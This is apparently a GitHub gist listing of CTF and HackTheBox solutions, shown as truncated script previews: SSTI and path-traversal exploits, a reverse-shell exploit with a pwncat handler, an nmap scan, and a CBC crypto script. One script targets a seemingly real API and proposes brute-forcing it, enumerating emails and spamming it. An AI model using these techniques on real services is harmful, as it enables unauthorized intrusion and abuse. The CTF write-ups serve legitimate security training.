xl00t

## api.py
#!/usr/bin/env python3
import requests
import base64
import getpass

# as i see there is no rate limit implemented , we can bruteforce through all API endpoints.
# the register page can also be used in order to spam their backend.

API_FORGOT_PAGE = "https://api.seela.io/hub/auth/forgot-password" # Permit email enumeration
API_LOGIN_PAGE = "https://api.seela.io/hub/auth/login"

## pgp_ssti.py
#!/usr/bin/env python3
import requests
import pgpy
from pgpy.constants import PubKeyAlgorithm, KeyFlags, HashAlgorithm, SymmetricKeyAlgorithm, CompressionAlgorithm
from urllib3.exceptions import InsecureRequestWarning
import base64

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def createPGPKeysPayload(ssti_payload):

## solve.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                xl00t
                / solve.md
            
            
              Created
              October 22, 2023 12:27
            
              
                flag4all - SMUG
              
          
    SMUG - 498 points

6 Solves

My app is faulty can you get the flag?? https://smug.flag4all.sh
Format du flag : flag{xxx}
Challenge source
app/app.py


## Sizzle.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                xl00t
                / Sizzle.md
            
            
              Last active
              October 27, 2023 16:21
            
              
                Sizzle - HTB
              
          
    Enumeration

- Nmap

kali@kali:/home/kali/Desktop/HTB/box/Sizzle $ nmap -p- -v -sVC -oA nmap/full 10.10.10.103
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus

  
## exp.py
#!/usr/bin/env python3
import requests
import string
import random
import sys
from urllib3.util import SKIP_HEADER
from collections import OrderedDict
import subprocess
from threading import Thread
import socket

## exploi.py
#!/usr/bin/env python3
import sys, threading, requests

URL = f'http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/hereadd'
cookie = {'SESSA0': 'a'}

# find nginx worker processes
r  = requests.post(URL, data={'debug':1, 'region':'../../../../../proc/cpuinfo'}, cookies=cookie)
cpus = r.text.count('processor')

## extract_reset_password_links.py
#!/usr/bin/env python3
import requests
import os
import subprocess
import asyncio
import threading
import netifaces
import smtpd
import asyncore

## exploit.py
#!/usr/bin/env python3
"""Rusta Rhymes - Flag4All - Exploit

Usage:
    exploit.py <url> <revshell_ip> <revshell_port> [--handler]

Options:
    -h --help       Show this screen.
    --handler       Automaticly setup a pwncat-cs handler on defined port

## solve.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                xl00t
                / solve.md
            
            
              Created
              October 22, 2023 12:39
            
          
    Gishadb - 481

16 Solves

Ce serveur écoute sur 2 ports ! 443 et 222. Trouvez un moyen d'obtenir le flag.
This server listen on two ports: 443 and 222. Find a way to get the flag.
https://gishadb.flag4all.sh

Auteur : Penthium2 (BZHack)


## cbc.py
#!/usr/bin/env python3
import json
import os
import sys
import re
import binascii
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad,unpad

BLOCK_SIZE = 16
	#!/usr/bin/env python3
	import requests
	import base64
	import getpass

	# as i see there is no rate limit implemented , we can bruteforce through all API endpoints.
	# the register page can also be used in order to spam their backend.

	API_FORGOT_PAGE = "https://api.seela.io/hub/auth/forgot-password" # Permit email enumeration
	API_LOGIN_PAGE = "https://api.seela.io/hub/auth/login"
	#!/usr/bin/env python3
	import requests
	import pgpy
	from pgpy.constants import PubKeyAlgorithm, KeyFlags, HashAlgorithm, SymmetricKeyAlgorithm, CompressionAlgorithm
	from urllib3.exceptions import InsecureRequestWarning
	import base64

	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

	def createPGPKeysPayload(ssti_payload):
	#!/usr/bin/env python3
	import requests
	import string
	import random
	import sys
	from urllib3.util import SKIP_HEADER
	from collections import OrderedDict
	import subprocess
	from threading import Thread
	import socket
	#!/usr/bin/env python3
	import sys, threading, requests

	URL = f'http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/hereadd'
	cookie = {'SESSA0': 'a'}

	# find nginx worker processes
	r = requests.post(URL, data={'debug':1, 'region':'../../../../../proc/cpuinfo'}, cookies=cookie)
	cpus = r.text.count('processor')
	#!/usr/bin/env python3
	import requests
	import os
	import subprocess
	import asyncio
	import threading
	import netifaces
	import smtpd
	import asyncore
	#!/usr/bin/env python3
	"""Rusta Rhymes - Flag4All - Exploit

	Usage:
	exploit.py <url> <revshell_ip> <revshell_port> [--handler]

	Options:
	-h --help Show this screen.
	--handler Automaticly setup a pwncat-cs handler on defined port
	#!/usr/bin/env python3
	import json
	import os
	import sys
	import re
	import binascii
	from Crypto.Cipher import AES
	from Crypto.Util.Padding import pad,unpad

	BLOCK_SIZE = 16